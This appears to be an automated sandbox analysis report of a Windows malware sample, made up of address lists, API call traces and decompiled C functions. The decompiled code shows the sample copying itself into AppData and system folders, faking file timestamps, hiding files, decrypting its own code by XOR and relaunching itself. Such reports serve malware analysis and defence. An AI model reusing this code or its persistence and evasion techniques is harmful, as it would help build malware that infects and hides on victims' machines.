0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404dc7
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
0x00404cc9
0x00404cc5
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x004049e3
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004049dd
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x0040464a
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x00404644
0x00404307
0x0040430f
0x00404314
0x0040431a
0x0040431f
0x00404320
0x00404326
0x0040432b
0x00404336
0x0040433d
0x004043b6
0x004043bb
0x004043d4
0x004043db
0x004043dd
0x004043eb
0x00404402
0x00404408
0x00404408
0x004043dd
0x00404412
0x0040442b
0x00404432
0x00404434
0x00404454
0x0040445a
0x0040445a
0x00404434
0x00404461
0x00404469
0x00404472
0x00404477
0x0040447f
0x0040448b
0x0040448c
0x0040448d
0x0040448f
0x00404491
0x00404493
0x00404495
0x00404497
0x00404499
0x0040449b
0x0040449c
0x004044a3
0x004044a8
0x004044a8
0x00000000
0x004044a8
0x0040433f
0x00404344
0x00404345
0x0040434b
0x00404350
0x00404358
0x0040435e
0x00404364
0x0040436b
0x0040437a
0x0040437a
0x0040437f
0x00404380
0x00404386
0x0040438c
0x00404392
0x0040439f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040439f
0x00404371
0x00404378
0x00000000
0x00000000
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004042B2
GetFileTime.KERNEL32(00000000,?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004042DE
CloseHandle.KERNEL32(?,00000000,?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004042EA
GetSystemDirectoryA.KERNEL32 ref: 0040430F
lstrcat.KERNEL32(?,0041103E), ref: 00404320
lstrcat.KERNEL32(00000000,?), ref: 00404326

Part of subcall function 004010F7: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040111F
Part of subcall function 004010F7: SetFileAttributesA.KERNEL32(?,00000080,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040113D
Part of subcall function 004010F7: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401155

lstrcpy.KERNEL32(?,%CommonProgramFiles%\System\), ref: 00404358
lstrcat.KERNEL32(00000000,?), ref: 0040435E
ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,?,%CommonProgramFiles%\System\,?,00000104,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000,00000003), ref: 00404364
lstrcpy.KERNEL32(?,%AppData%\), ref: 0040438C
lstrcat.KERNEL32(00000000,?), ref: 00404392
ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,?,%AppData%\,?,00000104,00000000,00000000,?,%CommonProgramFiles%\System\,?,00000104,00000000,?,0041103E,?), ref: 00404398

Part of subcall function 004010F7: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,?,00001000,?,00000000,?,40000000,00000000,00000000,00000002), ref: 00401168
Part of subcall function 004010F7: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00001000,?,00000000,?,40000000,00000000,00000000), ref: 0040116E

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000), ref: 004043D4
SetFilePointer.KERNEL32(00000000,000000F0,00000000,00000002,?,40000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0041103E,?,00000100), ref: 004043EB
WriteFile.KERNEL32(00000000,004120E0,00000004,?,00000000,00000000,000000F0,00000000,00000002,?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00404402
CloseHandle.KERNEL32(00000000,00000000,004120E0,00000004,?,00000000,00000000,000000F0,00000000,00000002,?,40000000,00000000,00000000,00000003,00000000), ref: 00404408
CreateFileA.KERNEL32(?,80000100,00000001,00000000,00000003,00000000,00000000,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000), ref: 0040442B
SetFileTime.KERNEL32(00000000,?,?,?,?,80000100,00000001,00000000,00000003,00000000,00000000,00000000,?,0041103E,?,00000100), ref: 00404454
CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,80000100,00000001,00000000,00000003,00000000,00000000,00000000,?,0041103E,?), ref: 0040445A
SetFileAttributesA.KERNEL32(?,00000021,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404469
CloseHandle.KERNEL32(?,?,00000021,00000000,?,0041103E,?,00000100,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00404472
GetStartupInfoA.KERNEL32(?), ref: 0040447F
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,000000FF,?,?), ref: 0040449C
ExitProcess.KERNEL32(00000000,00000002,00000000,00000000,?,00000104,?,004107CF), ref: 004044A3

Strings

%CommonProgramFiles%\System\, xrefs: 0040434B
%AppData%\, xrefs: 00404386

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$lstrcat$AttributesEnvironmentExpandProcessStringsTimelstrcpy$DirectoryExitInfoPointerStartupSystemWrite
String ID: %AppData%\$%CommonProgramFiles%\System\
API String ID: 4177697711-964445440
Opcode ID: 7fc98520baf935fb20e7c8abf56b3c27680e5a798f4cfcd8dcb53bab41274933
Instruction ID: ec42c66a5461437713fc69f81584d350008a197d318898bee4584775647dcad9
Opcode Fuzzy Hash: 7fc98520baf935fb20e7c8abf56b3c27680e5a798f4cfcd8dcb53bab41274933
Instruction Fuzzy Hash: 564154B02447407AE630A6618C4AFDB319DAF84708F50853FB784F61D2DBBCA5458A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004010F7 Relevance: 15.1, APIs: 10, Instructions: 77
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004010F7(void* __eax, CHAR* __edx, CHAR* _a4080) {
				char _v12;
				long _v16;
				long _v20;
				void* _t9;
				long _t10;
				void* _t12;
				int _t14;
				void* _t22;
				CHAR* _t24;
				void* _t25;
				void* _t26;

				E00405C00();
				_t24 = __edx;
				_t9 = CreateFileA(_a4080, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t25 = _t9;
				if(_t9 == 0 || _t9 == 0xffffffff) {
					L9:
					_t10 = 0;
				} else {
					SetFileAttributesA(_t24, 0x80); // executed
					_t12 = CreateFileA(_t24, 0x40000000, 0, 0, 2, 0x80, 0); // executed
					_t22 = _t12;
					if(_t12 != 0) {
						if(_t12 != 0xffffffff) {
							while(1) {
								_t26 =  &_v12;
								_t14 = ReadFile(_t25, _t26, 0x1000,  &_v20, 0); // executed
								if(_t14 == 0) {
									break;
								}
								WriteFile(_t22, _t26, _v20,  &_v16, 0); // executed
								if(_v20 <= 0xfff) {
									CloseHandle(_t25); // executed
									CloseHandle(_t22);
									_t10 = 1;
								} else {
									continue;
								}
								goto L10;
							}
							CloseHandle(_t25);
							CloseHandle(_t22);
							DeleteFileA(_t24);
						} else {
						}
					}
					goto L9;
				}
				L10:
				return _t10;
			}

0x00401101
0x0040110f
0x0040111f
0x00401126
0x00401128
0x004011c2
0x004011c2
0x00401137
0x0040113d
0x00401155
0x0040115c
0x0040115e
0x00401163
0x00401195
0x004011a1
0x004011a7
0x004011ae
0x00000000
0x00000000
0x00401187
0x00401193
0x00401168
0x0040116e
0x00401173
0x00000000
0x00000000
0x00000000
0x00000000
0x00401193
0x004011b1
0x004011b7
0x004011bd
0x00000000
0x00401165
0x00401163
0x00000000
0x0040115e
0x004011c4
0x004011ce

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040111F
SetFileAttributesA.KERNEL32(?,00000080,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040113D
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401155
ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,?,80000000), ref: 004011A7
CloseHandle.KERNEL32(00000000,00000000,?,00001000,?,00000000,00000000,?,?,?,00000000,00000000,?,00001000,?,00000000), ref: 004011B1
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00001000,?,00000000,00000000,?,?,?,00000000,00000000,?,00001000,?), ref: 004011B7
DeleteFileA.KERNEL32(?,00000000,00000000,00000000,?,00001000,?,00000000,00000000,?,?,?,00000000,00000000,?,00001000), ref: 004011BD

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$AttributesDeleteRead
String ID:
API String ID: 3513576528-0
Opcode ID: 102bc896bbfe3713ab5ccd1befb2f6417b83988e95bd20baf21e1ed7d3442641
Instruction ID: ead7ac7a0f60c3fe050b3408b844e5b53074d73edae75ab17160c13d06c43734
Opcode Fuzzy Hash: 102bc896bbfe3713ab5ccd1befb2f6417b83988e95bd20baf21e1ed7d3442641
Instruction Fuzzy Hash: D2118F3024070036F23162229C4AFAF218DCF89B58FA0453BB354F91D1D6BCA841567E

Uniqueness

Uniqueness Score: -1.00%

Function 00403E5D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00403E5D() {
				void* _t428;
				signed char* _t429;
				signed char _t430;
				void* _t431;
				intOrPtr _t441;
				signed int _t443;
				signed char _t446;
				signed char _t447;
				signed char _t448;
				signed int _t450;
				long _t451;
				signed int _t452;
				void* _t454;
				char* _t459;
				signed int _t462;
				signed char* _t481;
				signed int _t484;
				void* _t486;
				signed int _t487;
				signed int _t488;
				void* _t492;
				signed int _t493;
				signed int _t494;
				CHAR* _t497;
				signed int _t499;
				long _t500;
				CHAR* _t501;
				signed int _t503;
				long _t504;
				CHAR* _t509;
				void* _t511;
				CHAR* _t512;
				void* _t514;
				char* _t524;
				signed int _t525;
				signed char* _t530;
				signed int _t533;
				signed int _t534;
				signed int _t540;
				signed int _t541;
				signed int _t546;
				signed int _t551;
				signed int _t553;
				void* _t555;
				signed int _t559;
				void* _t561;
				signed int _t566;
				long _t570;
				int _t571;
				signed int _t577;
				signed int _t579;
				signed int _t582;
				signed int _t589;
				signed int _t591;
				signed int _t593;
				signed int _t598;
				signed int _t601;
				signed int _t603;
				signed int _t606;
				signed int _t608;
				void* _t612;
				signed int _t617;
				signed int _t619;
				signed int _t621;
				int _t625;
				void* _t626;
				void* _t628;
				char* _t629;
				char* _t630;
				signed int _t631;
				char* _t632;
				char* _t633;
				char* _t634;
				char* _t635;
				char* _t636;
				signed int _t637;
				char* _t638;
				signed int _t639;
				char* _t641;
				CHAR* _t642;
				signed int _t646;
				signed int _t648;
				int _t651;
				void* _t665;
				int _t666;
				signed int _t669;
				CHAR* _t675;
				signed int _t677;
				long _t678;
				signed int _t683;
				signed int _t691;
				signed int _t692;
				signed char _t700;
				signed int _t706;
				signed int _t710;
				void* _t712;
				int _t713;
				void* _t716;
				signed char _t727;
				int _t728;
				signed char* _t729;
				void* _t730;
				void* _t732;
				signed int _t737;
				void* _t739;
				void* _t740;
				long* _t741;
				signed int* _t744;
				long _t754;
				int _t755;
				signed char _t765;
				void* _t768;
				signed int _t770;
				int _t771;
				CHAR* _t772;
				void* _t773;
				void* _t775;
				signed int _t778;
				void* _t780;
				void* _t781;
				void* _t782;
				signed int* _t785;
				void* _t794;
				int _t795;
				signed char _t805;
				int _t813;
				CHAR* _t815;
				void* _t821;
				void* _t828;
				CHAR* _t833;
				signed int _t834;
				signed int _t836;
				void* _t838;
				void* _t845;
				signed int _t847;
				signed int _t849;
				signed int _t852;
				signed int _t855;
				void* _t859;
				long _t860;
				int _t862;
				signed int _t872;
				signed int _t873;
				CHAR* _t886;
				CHAR* _t887;
				char* _t888;
				CHAR* _t889;
				CHAR* _t890;
				CHAR* _t891;
				CHAR* _t892;
				CHAR* _t893;
				CHAR* _t894;
				CHAR* _t895;
				long* _t896;
				void** _t897;
				char* _t898;
				char* _t899;
				CHAR* _t900;
				signed int _t903;
				char* _t904;
				char* _t906;
				char* _t907;
				char* _t908;
				long* _t909;
				CHAR* _t910;
				int _t911;
				CHAR* _t912;
				CHAR* _t913;
				void* _t914;
				signed int* _t916;
				char* _t917;
				void* _t918;
				CHAR* _t919;
				CHAR* _t920;
				void* _t921;
				signed int* _t923;
				char* _t924;
				CHAR* _t925;
				struct _STARTUPINFOA* _t926;
				void* _t927;
				void* _t928;
				long _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				CHAR* _t933;
				signed char _t934;
				long* _t938;
				long* _t939;
				signed int _t940;
				signed char _t942;
				signed char _t947;
				long _t948;
				long _t949;
				void* _t950;
				signed int* _t974;
				signed char* _t975;
				signed char* _t976;
				signed int* _t978;
				signed int* _t981;
				void* _t986;
				void* _t987;
				char* _t988;
				signed char* _t989;
				void* _t990;
				void* _t991;
				long _t992;
				signed int _t993;
				signed int* _t994;
				void** _t995;
				signed int _t997;
				void** _t998;
				void** _t999;
				char* _t1000;
				CHAR* _t1001;
				signed char* _t1002;
				long* _t1003;
				signed int* _t1004;
				void* _t1005;
				void* _t1006;
				char* _t1007;
				signed int* _t1008;
				void* _t1009;
				char* _t1010;
				signed int* _t1011;
				CHAR* _t1013;
				signed int _t1014;
				signed int _t1015;
				signed int* _t1016;
				long _t1017;
				struct _FILETIME* _t1018;
				void* _t1019;
				void* _t1020;
				long* _t1021;

				if(_t428 != 0xffffffff) {
					SetFilePointer(_t428, 0xfffffff0, 0, 2); // executed
					ReadFile( *(_t1020 + 0xb0), 0x4120e0, 0x10, _t1020 + 0xa0, 0); // executed
					CloseHandle( *(_t1020 + 0xa0)); // executed
					if( *0x4120e0 == 0) {
						 *0x4120e0 = E004010B2();
						 *(_t1020 + 0x20) = 1;
					}
				}
				_t429 = ".exe";
				goto L4;
				L15:
				__eflags = _t447 - 0x40880d;
				if(_t447 < 0x40880d) {
					 *_t447 =  *_t447 ^ 0x000000d4;
					__eflags =  *_t447;
					_t447 = (_t447 ^ _t947) + 1;
					goto L15;
				}
				_t448 = "Default Flags";
				while(1) {
					__eflags = _t448 - 0x4087a5;
					if(_t448 >= 0x4087a5) {
						break;
					}
					 *_t448 =  *_t448 ^ 0x000000d4;
					__eflags =  *_t448;
					_t448 = (_t448 ^ _t947) + 1;
				}
				 *(_t1020 + 0x34) = 1;
				while(1) {
					_push( *(_t1020 + 0x34));
					wsprintfA(0x408816, "%02X");
					_t450 = CreateMutexA(0x408778, 1, "qnd_b__-12"); // executed
					 *(_t1020 + 0x1c) = _t450;
					_t1020 = _t1020 + 0xc;
					__eflags = _t450;
					if(_t450 == 0) {
						goto L64;
					}
					_t451 = GetLastError();
					__eflags = _t451 - 0xb7;
					if(_t451 != 0xb7) {
						__eflags =  *(_t1020 + 0x34) - 0x11;
						if( *(_t1020 + 0x34) > 0x11) {
							_t886 = _t1020 + 0x134c;
							_t452 = ExpandEnvironmentStringsA("%ComSpec%", _t886, 0x104);
							__eflags = _t452;
							if(_t452 != 0) {
								_t838 = CreateFileA(_t886, 0x80000000, 1, 0, 3, 0, 0); // executed
								 *(_t1020 + 0xa0) = _t838;
								__eflags = _t838 - 0xffffffff;
								_t986 = _t838;
								if(_t838 != 0xffffffff) {
									GetFileTime(_t986, _t1020 + 0x84, _t1020 + 0x88, _t1020 + 0x8c);
									CloseHandle( *(_t1020 + 0xa0));
									 *(_t1020 + 0xc) = 1;
								}
							}
							__eflags =  *(_t1020 + 0x1c);
							if( *(_t1020 + 0x1c) != 0) {
								L86:
								_t454 = CreateFileA(_t1020 + 0x1580, 0x80000000, 1, 0, 3, 0, 0);
								 *(_t1020 + 0xa0) = _t454;
								__eflags = _t454;
								if(_t454 == 0) {
									L89:
									 *(_t1020 + 0x14) = 0;
									_t1017 = 0;
									__eflags = 0;
									L90:
									CloseHandle(CreateThread(0, 0x1000, E00401038, _t1020 + 0x1570, 0, _t1020 + 0x9c));
									_t459 = 0x408720;
									while(1) {
										__eflags = _t459 - 0x408776;
										if(_t459 >= 0x408776) {
											break;
										}
										 *_t459 =  *_t459 ^ 0x000000d4;
										_t459 =  &(_t459[1]);
									}
									while(1) {
										__eflags = 0x407b20 - 0x408720;
										if(0x407b20 >= 0x408720) {
											break;
										}
										 *0x407b20 =  *0x407b20 ^ 0x0000004d;
										__eflags =  *0x407b20;
										 *(_t1017 + 0x40) =  *(_t1017 + 0x40) ^ _t934;
									}
									__eflags =  *0x412100 - 2;
									if( *0x412100 != 2) {
										L122:
										 *(_t1020 + 0x78) = 0x10;
										_t887 = _t1020 + 0x1ec;
										_t462 = GetComputerNameA(_t887, _t1020 + 0x78);
										__eflags = _t462;
										if(_t462 == 0) {
											L124:
											_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
											_push(_t1020 + 0x1bc);
											L00405E20();
											L128:
